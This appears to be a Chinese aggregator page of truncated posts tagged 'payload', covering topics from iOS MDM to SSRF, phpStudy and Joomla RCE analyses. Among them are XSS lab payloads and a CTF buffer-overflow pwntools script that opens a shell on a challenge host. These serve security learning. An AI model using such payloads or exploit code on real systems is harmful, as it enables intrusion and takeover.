payload

Updating Configuration Profile installed in iOS device in MDM

柔情痞子 提交于 2019-12-01 05:49:46
I want to send a configuration payload to a device. Eg. I want to send a restriction payload (Disallow safari) to a particular device. i.e. I want to update the configuration profile installed on the device. Do I need to send this configuration profile payload same way as I send the query payloads? Do I need to include all the configuration payloads of the configuration profile which exists on the device? OR Just need to send the one I need to update. Please help!!! It needs to be the contents of the containing the PayloadContent of the profile you wish to install which has been Base64 encoded

ssrf简介

笑着哭i 提交于 2019-12-01 05:09:52
SSRF漏洞分析、利用及防御 0x01 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 SSRF漏洞的寻找(漏洞常见出没位置): 能够对外发起网络请求的地方,就可能存在 SSRF 漏洞 从远程服务器请求资源(Upload from URL,Import & Export RSS Feed) 数据库内置功能(Oracle、MongoDB、MSSQL、Postgres、CouchDB) Webmail 收取其他邮箱邮件(POP3、IMAP、SMTP) 文件处理、编码处理、属性信息处理(ffmpeg、ImageMagic、DOCX、PDF、XML) 分享:通过URL地址分享网页内容 转码服务 在线翻译 图片加载与下载:通过URL地址加载或下载图片 图片、文章收藏功能 未公开的api实现以及其他调用URL的功能 从URL关键字中寻找 0x02 常见后端实现 file_get_contents

XSS挑战之旅平台通关练习

不想你离开。 提交于 2019-12-01 05:07:49
1 、第一关 比较简单,测试语句: <svg/onload=alert(1)> <script>confirm( 1)</script> <script>prompt( 1)</script> <script>alert( 1)</script> html页面简单的三种对话框如下: 1、alert(),最简单的提示框: alert("你好!"); 2、confirm(),有确认和取消两个按钮: if(confirm("还有继续吗?")){ alert("继续"); }else{ alert("再见"); } 3、prompt(),可以输入信息: var name = prompt("你的名字是:"); alert("你好," + name); 2 、第二关 此处为搜索型的 xss ,分析代码,使用的是 get 方法,从 url 中接受一个 keyword 搜索参数,此处用到了一个过滤函数 htmlspecialchars (),这个函数把预定义的字符转换为 HTML 实体,“ > ”和“ < ”转义了,属于黑名单绕过,那就是不使用被过滤的符号,使用 js 的事件,如: " onmouseover=alert(2) >click 。还需要注意的地方就是前面的符号闭合 . 另一个 payload : "><sript>alert(2)</script> ,仍然是注意前面的闭合,就可以了

phpStudy后门漏洞利用复现

妖精的绣舞 提交于 2019-12-01 01:57:10
phpStudy后门漏洞利用复现 一、漏洞描述 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer 多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户。 正是这样一款公益性软件,2018年12月4日,西湖区公安分局网警大队接报案称,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据 回传大量敏感信 二、漏洞影响版本 phpStudy2016 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy2018 PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll 三、漏洞复现 1、复现环境win7+phpStudy 2016(php-5.4.45+Apache)    2、检查是否引用了php_xmlrpc.dll文件(只要引用了该文件,恶意代码就可以触发) 2.1通过phpinfo下查看    2.2通过php.ini配置文件查看    3

Joomla 3.0.0 - 3.4.6 RCE漏洞分析记录

匆匆过客 提交于 2019-11-30 23:01:00
0x00 前言 今天早上看到了国内几家安全媒体发了Joomla RCE漏洞的预警,漏洞利用的EXP也在Github公开了。我大致看了一眼描述,觉得是个挺有意思的漏洞,因此有了这篇分析的文章,其实这个漏洞的分析老外在博客中也写过了,本质上这是一个Session反序列化导致的RCE漏洞,由于Joomla对于Session的特殊处理,导致漏洞触发并不需要登陆。因此成了Pre-auth RCE. 0x01 漏洞环境搭建 代码下载: https://github.com/joomla/joomla-cms/releases/tag/3.4.6 下载安装就好,要求php 5.3.10 以上,其他跟着提示走就ok 。 0x02 漏洞原理分析 PHP对Session的存储是默认放在文件中,当有活动会话产生使用到Session时候,将会在服务端php设置好的路径写入一个文件,文件的内容为默认序列化处理器序列化后的数据。在Joomla中则改变了PHP的默认处理规则,将序列化之后的数据存放在数据库中,这步操作对应的处理函数为\libraries\joomla\session\storage\database.php 中的write: /** * Write session data to the SessionHandler backend. * * @param string $id The

APNs

六眼飞鱼酱① 提交于 2019-11-30 21:37:28
APNs 是苹果推送通知服务,在设备与苹果的推送通知服务器会保持常连接状态。当你想发送一个推送通知给某个用户的 iPhone 上的应用程序时,你可以使用 APNs 发送一个推送消息给目标设备上已安装的某个应用程序。 流程 当在 iPhone 上第一次打开某个应用时, iOS 设备会跟 APNs Service 索要 deviceToken , 应用程序将上一步得到的 deviceToken 发送给后台,后台保存好当前用户的 deviceToken 服务端向 APNs Service 发送消息 APNs Service 将消息发送给 iPhone 应用程序 iOS 12345678 - (void)application:(UIApplication*)application didRegisterForRemoteNotificationsWithDeviceToken:(NSData*)deviceToken{ NSString *deviceTokenString = [NSString stringWithFormat:@"%@", deviceToken]; NSString *string = [deviceTokenString stringByReplacingOccurrencesOfString:@" " withString:@""]; string =

绕过dva dispatch在更新model数据的异步

我是研究僧i 提交于 2019-11-30 21:15:13
我的业务是在更新选择列表后,马上进行总价格更新,那么由于model的更新不是实时的,因此我在this.props得到的值还是旧值,解决办法就是通过dispatch成功返回的值,传给计算函数 handleTotalCalcu 使用,而不是在 handleTotalCalcu 用this.props取值 const { payload } = dispatch({ type: 'im/updateState', payload: { selectedArr: arr, }, }) // 计算总价格 this.handleTotalCalcu(payload) 来源: https://www.cnblogs.com/ww01/p/11640715.html

Pwn-level2

本秂侑毒 提交于 2019-11-30 19:36:38
题目地址 https://dn.jarvisoj.com/challengefiles/level2.54931449c557d0551c4fc2a10f4778a1 先看一下文件的属性 32位 在看看保护机制 开启了NX 那么就不能shellcode 丢到IDA看看 main函数先执行vulnerable_function,在输出hello world IDA按Shift+F12查看字符,发现有shell 那么可以利用read函数的栈溢出,buf需要填充0x92个字符(0x4+0x88) 现在可以构造一个system("/bin/sh")的伪栈帧,通过控制vulnerable_function函数返回到该伪栈帧的地址,执行system("/bin/sh")来获取shell system的地址为08048320 /bin/sh的地址为0804A024 from pwn import * r=remote('pwn2.jarvisoj.com',9878) payload='a'*(0x88+0x4)+p32(0x08048320)+'aaaa'+p32(0x804a024) //跳到system地址,返回地址为0xaaaa,参数为/bin/sh r.sendline(payload) r.interactive() 或者 from pwn import * p = remote(

Request payload limit with AWS API Gateway

醉酒当歌 提交于 2019-11-30 19:31:16
What is the request-payload limit with AWS API-Gateway? I need to send a JSON payload with base64 encoded files and some other parameters to API Gateway, that will then pass on the payload to AWS Lambda. I could not find AWS documentation regarding this. Vijayanath Viswanathan Maximum payload to API gateway is 10 MB and maximum payload for Lambda is 6 MB, which cannot be increased. Please see API gateway payload limits here Please see Lambda payload limits here But there is an alternative way (a work around) to achieve the same by uploading data to an S3 bucket if your size is more that 10 MB.

[python]如何在requests post时不做urlencode?

随声附和 提交于 2019-11-30 18:45:34
这两天要为公司一个项目的服务端写性能测试脚本,其中有一个请求订单号的接口,需要客户端用post请求向服务端发送加密过的token 和订单数据。代码如下: payload = {'token':token,'order_data':order_data} r = requests.post(url, data=payload} 但是,服务端返回错误,花了很长时间检查了token和order_data的加密算法,确认没错; 查了下文档,上面有这样一句话: There are many times that you want to send data that is not form-encoded. If you pass in a string instead of a dict , that data will be posted directly. 所以,只要直接传一个string作为payload数据,requests就不会做任何转换,直接发出去。 这样,代码就改为: payload = "token="+token+"&order_data="+order_data r = requests.post(url, data=payload} 但是,奇怪的是,服务端还是报错。 后来只好换用curl来发 cmd = 'curl -d \"token=' +token+'&json